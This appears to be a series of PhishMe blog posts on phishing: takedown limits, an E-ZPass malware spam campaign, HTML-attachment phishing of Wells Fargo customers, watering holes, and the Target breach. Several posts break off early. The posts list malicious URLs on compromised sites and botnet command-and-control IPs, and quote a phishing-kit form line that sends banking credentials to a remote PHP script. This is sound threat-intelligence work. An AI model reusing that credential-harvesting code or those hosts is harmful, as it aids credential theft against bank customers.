Phishing: Stop Paving the Cow Path

Paving the cow path—why are we still using the same technologies to combat modern phishing attacks?

When the city of Boston was new and unpaved, the city fathers decided against laying out a regular street plan. Instead, they merely paved the paths that had been worn by cattle. The results? A chaotic and inefficient street plan that lacks logic. The admonition not to “pave the cow path” is supposed to remind us not to enshrine an existing way of doing something.

However, when combating phishing, the #1 threat vector in security*, we are paving the cow path.

Let’s start with some facts about email-based threats and their effectiveness:

  • 144 Billion emails every day/120 per person
  • 1 out of every 2 emails contains a threat
  • 10% of all email threats get through current defenses
  • 1 out of every 200 are effective

If we were building cars, computers or producing a ‘widget’ and had a 10% ‘defect’ rate, we would be out of business. Period. And yet what do we do today?

We pave the cow path.

To some degree or another, major enterprises recognize the need for combating all types of email-based threats, including phishing, spam and email-based malware.  As a result, we have many existing technologies in the ‘food chain’ for providing protection against phishing, including:

  • Security Awareness Training (Education & Training)
  • Filters (spam, phishing)
  • Web filtering
  • Forensic services
  • Takedown services
  • Standards/DMARC

If we look at these technologies as anti-phishing solutions, they all have one thing in common: they deal with the symptoms of phishing. They do not address the root source/ root cause issues. As a result, each provides some deterrent or protection against phishing issues. None address the cause: the source and nature of the cyberattack. Therefore, none of the current technologies can holistically address the countermeasures to prevent, detect and respond to existing and future phishing attacks.

We recently spoke with one of world’s most phished companies/brands. How were they attempting to solve the ever-increasing phishing problem (up 87% since 2012 according to Kaspersky) that they (and most others) are experiencing?

They planned to do more of the same.

Specifically, they planned to continue with their take down strategy. (For those of you unfamiliar with takedown or mitigation, there are companies that offer banks and other organizations round-the-clock services to assist in shutting down phishing websites)

First, they enlisted external resources (vendor)s for takedown.

Then, they began taking care of their takedown efforts internally.

Then, they adopted a hybrid approach, using both internal and external resources.

And now, they were planning to do more of both.

Do you see a pattern?

Yes, that’s right, it’s not working. Yet, they are planning to increase the use of ineffective tactics.

The status quo is not solving the problem. Whether you are utilizing internal or external resources, you are paving the cow path. The dirty secret of takedown vendors that every security professional knows is that most credential theft occurs within the first four hours of a phishing campaign. If your takedown time is greater than two hours, the phisher has already collected enough information to consider his mission a success. In short, no matter how fast the takedown promises to be, the phishers are faster. The damage is done. And spending more time and money on a fundamentally broken process doesn’t make it better. Adding more people to a broken process doesn’t make it better either. Takedown doesn’t solve the problem. It could, if it was done intelligently. But today, these services are the one-eyed man in the land of the blind for those looking for eliminate phishing servers.

Phishing can’t be solved by one technology, so the good news is there are multiple processes and technology in existence today to address the challenge. However, cybercriminals are moving ahead of many of the existing layers of defense, and becoming more successful.  We read about it every day, from the Target attack to Bank of America, Comerica, PayPal, Wells Fargo, Michael’s stores (and many, many others we don’t hear about.)

I think it is a natural tendency to want to pave the cow path; after all, what is wrong with how we are doing business today? Or, we may look at it from the perspective: we don’t have time to look at improving our processes, so by default we will have to pave the cow path. But by paving the phishing cow path, you will lose. It’s that simple. Continuing to play ‘whac-a-mole’ with the cybercriminals, and using tools from the ‘last war’ is not a winning. It’s losing. And with the cost of each phishing attack approaching $150,000, can you afford to lose even once?

The E-ZPass Scam: More Information On This Week’s Attacks

Earlier this week, reports surfaced about a new E-Z Pass scam. The spam campaign used the E-ZPass branding to fool recipients into visiting a malicious website. E-Z Pass is the electronic toll collection system used by several state departments of transportation.

The E-Z Pass scam emails are likely to be sent to a large number of individuals who use the system, after all, the toll system is used in many cities. One of the emails we captured is shown in the image below. As you can see, the E-Z Pass scam emails use appropriate branding, and warn the recipient that they have not paid for driving on a tol road. A link to an invoice is included that will allow the recipient to view their invoice.

A quick search of PhishMe’s threat intelligence database shows that this is not the only email of this type that has been intercepted. The following related emails were also captured:

date    |                subject                |           sender_name
————+—————————————+———————————
2014-07-08 | In arrears for driving on toll road   | E-ZPass Collection Agency
2014-07-08 | In arrears for driving on toll road   | E-ZPass Info
2014-07-08 | In arrears for driving on toll road   | E-ZPass Customer Service Center
2014-07-08 | In arrears for driving on toll road   | E-ZPass Info
2014-07-08 | Indebted for driving on toll road     | E-ZPass Service Center
2014-07-08 | Indebted for driving on toll road     | E-ZPass Service Center
2014-07-08 | Indebted for driving on toll road     | E-ZPass Collection Agency
2014-07-08 | Indebted for driving on toll road     | E-ZPass Customer Service Center
2014-07-08 | Indebted for driving on toll road     | E-ZPass Info
2014-07-08 | Indebtedness for driving on toll road | E-ZPass Collection Agency
2014-07-08 | Indebtedness for driving on toll road | E-ZPass Customer Service Center
2014-07-08 | Indebtedness for driving on toll road | E-ZPass Customer Service Center
2014-07-08 | Pay for driving on toll road          | E-ZPass Info
2014-07-08 | Payment for driving on toll road      | E-ZPass Info
2014-07-08 | Payment for driving on toll road      | E-ZPass Info
2014-07-08 | Payment for driving on toll road      | E-ZPass Info

As you can see, while the E-Z Pass scam uses appropriate branding, the destination websites of the links are certainly not genuine. None of these are used for E-Z Pass.

machine          |                               path
—————————+——————————————————————-
www.federalparts.com.ar   | /tmp/api/3eLv aFKXBvmuxydKFVfEZIMWSl7f4VJfOpfcdAHPeo=/toll
www.fiestasnightclub.com  | /tmp/api/kJ1a5XRhE7MM9YhRVR1186why1TgPCPH7aieECyjb I=/toll
www.flavazstylingteam.com | /tmp/api/vBrLdEDWRK4sXs6KaHEbWzHnbEYIFSo42BZvGd4crCY=/toll
www.fleavalley.com        | /tmp/api/ycI2IRHcInDd1/cetyLMZMjwyxKxTAEHFkjk1dRUfYs=/toll
www.frazeryorke.com       | /wp-content/api/LtvaZdAvP3GFuaqyulY/C3haFCeID3krbtMHt52cdnM=/toll
www.fsp-ugthuelva.org     | /tmp/api/fMVyiIXcbY9gamr17zPrnhTgz2Zvs825GTmvvRjlTIA=/toll
www.fyaudit.eu            | /components/api/yiBOsvUdvftbCd4Fa1zmVtIkbs4x3ThiUnFoIgwyI9Q=/toll
www.giedrowicz.pl         | /tmp/api/R4a4iKmACUtWoRHq1DsCiQ1aH 3J7QgBMfp1zq8gqj8=/toll
www.gostudy.ca            | /components/api/Q/sV7HtfnZGOW4lzlLSfFuKM/lLu8LQmOlT TVXKb2o=/toll
www.graphiktec.com        | /tmp/api/nZbX6I6vYQrsTlY4OAw44Qq96Lnw/JOoLDdBmdLh21M=/toll
www.h2oasisinc.com        | /components/api/BivlBt/AhVodCMM9zRuvcQpIyG2X6Knd8sERnP1 QDA=/toll
www.habicher.eu           | /tmp/api/yra96tiDlyYbYxsbJpr/hDVSPmwh6GKYLF6PaD3nUAI=/toll
www.grupoancon.com        | /components/api/6jI99hwDmjAvkEvuX8JvVSkS3InPtLii ZN3dbIVkOM=/toll
www.happymaree.com.au     | /tmp/api/d4ik5Y2GvCVSSJQhXI9wYYpBvxjLS78peeRYMKV0V7c=/toll
www.headspokerfest.com    | /tmp/api/RTuPCuYLjaj1KnTeJrMlCoH9HL4IixR eBvajB6TCeE=/toll
www.headspokerfest.com    | /tmp/api/43J6l5G/CkNp6kmGl0b jUY/oOL4411pPds8nylDE5g=/toll

Naturally, we visited the one of the URLs to find out what would happen. Clicking on the link would result in a prompt to download a zip file, which presumably would contain the invoice. Instead of a Word file, Excel spreadsheet, or PDF file, the zip file contained an  executable (.exe) file.

Both are named for the city and ZIP code to which we are connected.

For example, this relates to an E-Z Pass charge in Birmingham, Alabama.

When we run this malware, it attempts to make contact command and control servers at the following locations:

76.74.184.127:443
113.53.247.147:443
50.57.139.41:8080
188.165.192.116:8080
82.150.199.140:8080
203.157.142.2:8080
212.45.17.15:8080
92.240.232.232:443
188.165.192.116:8080

PhishMe has been tracking the ASProx botnet for some time. Most of these IP addresses were already known to belong to the ASProx botnetand have been used for some time. In fact, this botnet was used to send the Holiday Delivery Failure spam emails that imitated Walmart, CostCo, and BestBuy during the holiday season, and also Court Related Malware in early 2014.

An inside look at Dropbox phishing: Cryptowall, Bitcoins, and You (updated)

Post Updated on June 10

On Monday, I wrote about attackers using phishing attacks to deliver malware via links to Dropbox. Today, we received another wave of these emails with slightly different subject lines. Figures 1, 2, and 3 show the variants that were received by us in the latest campaign, and reported by our internal users. In this campaign, 10 of our users were targeted.

Phishing with a malicious .zip attachment

A few weeks ago, we received a round of phishing emails with malware that seemed a little more special than your run-of-the-mill ZeuS, so we decided to give it some analysis. The email was reported by a user at PhishMe. We really do drink our own kool-aid. Figure 1 shows a screenshot of the email that is being analyzed.

Figure 1

Figure 1 — Original Message

HTML Attachment Phishing: What You Need to Know

Are you aware of HTML attachment phishing? It is one of the latest trends with cybercriminals. Instead of emailing downloaders that contact C7C servers to download crypto malware, Troijans, or other nasties, HTML attachments are being sent. HTML attachment phishing is less well known, and as a result, many people are falling for phishing scams.

Even though this past weekend was a holiday weekend for many, there is a good chance that you still checked your email fairly often. If you are like me, you typically use your phone or another mobile device to check your email on the go. This past weekend, you were probably multitasking and may not have been on high-alert for a fraudulent message while you were checking email in between hiding and finding Easter eggs.

Hackers know these things.

So, they send crafty messages like this one (shown as opened in the Thunderbird email client):

If you open that message on your phone, the attachment would probably download with the message, and all you have to do is click to view it. This is a little different than your typical phishing message; a typical phishing message contains a button that has an embedded link that takes you to a lookalike of your bank’s or another online service provider’s real web site.

In today’s example, the phishing page has been stored as a file that looks like the following in a desktop browser:

It will also load up in your phone’s browser, but Safari (or another browser) on your phone may just show you a truncated version of the Internet address you are visiting. When it is a local file, you may just see a portion of the name of the file, Wells_Fargo-Personal-Business_Banking.htm as on my iPhone below:

So, what can Wells Fargo do about that? You may think there is no phishing content to be taken down or removed because it seems encapsulated in the email message. You may think that nobody is harmed if you don’t reply or fall for logging in this way. However, some folks WILL reply, and there is fraudulent content on the Internet that can be referred by Wells Fargo to their takedown provider.

In the source code of the HTML attachment are instructions for how to handle the credentials that the victim enters. Below is a snippet of the code from this phishing attack:

<form id=”frmSignon” action=”hxxp://gospelvideo.com.br/wp-includes/images/smilies/zate.php” autocomplete=”off” method=”post” name=”signon”>

The highlighted portion is the path to a PHP script on a compromised server in Portugal that hosts a domain belonging to a Brazilian gospel video web site. Undoubtedly, if we could view the source code of that PHP script, we would see that is contains the email address of the criminal who is receiving the stolen Wells Fargo credentials. Wells Fargo wants to remove this fraudulent content before its customers can be victimized.

When we visit that page, we see that the PHP code redirects victims to what we call the “exit URL” which is a legitimate login page at Wells Fargo. The victim will then think that their login failed, and they will try to log in again. It is at that moment that Wells Fargo can recognize that customers who login there—having been referred from the gospelvideo.com.br URL—are customers who likely just gave up their authentication credentials and should have their accounts locked until the situation is rectified.

PhishMe provides the intelligence that enables Wells Fargo and other spoofed brands tackle this threat vector. Our PhishMe Intelligence system scans over two million spam messages daily to identify the messages that are delivering HTML attachments. Then we use our patented technology to automatically identify the file as a phishing attack and extract the relevant intelligence.

PhishMe digs deeper than other threat intelligence service providers to find the source of the attacks.  Learn more about how we can help you protect your brand here

Watering Holes vs. Spear Phishing

How Does A Watering Hole Attack Work?

Water holing attacks originate by compromising trusted websites and infecting the computers or other devices that visit that site. A successful watering hole attack casts a wide net and has the potential to compromise a large number of users across multiple organizations. This flood of information is a double-edged sword, as attackers have to parse through a large amount of data to find information of value. Additionally, these attacks often exploit zero-day vulnerabilities, so their increased popularity means attackers are burning through zero-days faster, and companies are responding faster as well, stopping attacks earlier in the kill-chain.

 These attacks are an effective tactic, that when executed properly, can deliver widespread damage on a large scale. Symantec released an excellent report describing the APT group “Hidden Lynx”, who the report describes as the inventors of the watering hole technique. The report details last year’s VOHO campaign, which targeted iOS developers, and impacted users at Facebook, Apple, and Twitter – showing the power of a water holing.

The Danger Of Indiscriminate Watering Hole Attacks

Instead of viewing indiscriminate watering-hole attacks as a replacement for spear phishing, they can be seen as an additional tool at adversaries’ disposal, which is what makes it so dangerous. Like all tools, spear phishing and watering hole attacks have specific strengths and weaknesses that suit them well for certain jobs while making them limited in other situations.

As described above, watering hole attacks gather huge amounts of data that attackers will have to sift through for useful information, thus slowing down their ability to take additional malicious action.

Spear phishing, on the other hand, offers attackers the ability to focus more on specific targets and information. A successful spear phishing attack provides immediate access to a target’s systems. Given the amount of readily available information on organizations and their employees on the Internet, attackers can easily identify targets and craft seemingly genuine emails that will provide gateways to specific systems and ultimately data. Spear phishing can exploit zero-days to drop malware on a host, but it doesn’t rely on vulnerabilities. Simple social engineering tactics have allowed groups such as the Syrian Electronic Army to carry out a multitude of high-profile attacks.

“Spear phishing offers attackers the ability to focus more on specific targets and information.”

Anecdotal evidence continues to highlight spear phishing as the source of most high-profile breaches. As previously mentioned, spear phishing is the attack method of choice for the Syrian Electronic Army. Brian Krebs also reported that the Target breach started with a spear phishing email that unloaded malware and stole login credentials from Target vendor Fazio Mechanical.

The fact that news reports around watering hole attacks are stating “watering-hole usage” rather than “company x compromised by watering hole attack” indicates that either companies aren’t discussing successful campaigns, or that the attackers are still refining their tactics. Even if they are successful, the attackers may be inundated with information and are still deciding whether they have found anything useful.

There’s no denying that watering-hole attacks are making an impact, but the idea that it is replacing spear phishing is erroneous. While Symantec’s 2014 Internet Security Threat Report notes a decrease in the overall volume of spear phishing emails, the number of campaigns increased by 91%. Adversaries aren’t turning away from spear phishing as an attack method; instead they are sharpening the focus of their attacks. Symantec attributes this to growing user awareness (we’d like to take some credit for that), but it is probably also due to the dynamics discussed above.

For casting a wider net intended to compromise a large number of users, watering-hole attacks are an effective tactic, but for a highly focused attack seeking specific information, a well-crafted spear phish is still an adversary’s best weapon.

Woops! Army’s attempt at a phishing simulation bombs

At PhishMe, we feel like we’ve done a pretty good job of debunking the idea that you can address the spear phishing threat using the pentest model, but after reading this Washington Post story about a phishing test gone awry, it looks like we still have some work to do.

In this test, an Army combat commander sent an email to a “small group” of Army employees disguised as an email from their retirement plan provider urging them to log in to their accounts. The email used the name of Thrift Savings Plan, the actual 401(k) account provider for most federal employees, and provided no indication that it was a simulated phishing exercise, causing a panic across the DoD as concerned recipients shared the email with colleagues and flooded the Thrift Savings Plan customer support line. It took nearly three weeks for the Pentagon to trace the origin of the email.

Phishing for passwords with malware

Reports from the Target breach investigation continue to trickle in, with Brian Krebs now citing multiple sources close to the investigation that have traced the initial compromise to login credentials stolen through a phishing email.

Last week, we discussed how attackers can steal credentials without using malware through data-entry phishing. While this tactic is a common and highly effective technique, the latest report on Target alleges that Citadel, a password-stealing derivative of the ZeuS banking Trojan, was responsible for stealing login credentials from Target vendor Fazio Mechanical, which provided attackers with the foothold they needed in Target’s network.

The Resurgence of Data-Entry Phishing Attacks

‘Old School’ email social engineering or data-entry phishing is an attack method that has been on the rise in recent months, notably employed by the Syrian Electronic Army to hack seemingly every major media outlet in the Western hemisphere, and possibly responsible for other high-profile breaches.

A Target spokesperson confirmed last week that attackers initially gained access to the company systems through stolen credentials obtained through a vendor. While Target has not confirmed the exact method through which the credentials were stolen, one possible scenario is that attackers sent a spear-phishing email to the vendor, obtained valid login credentials for Target, and used those credentials to gain a foothold in Target’s network.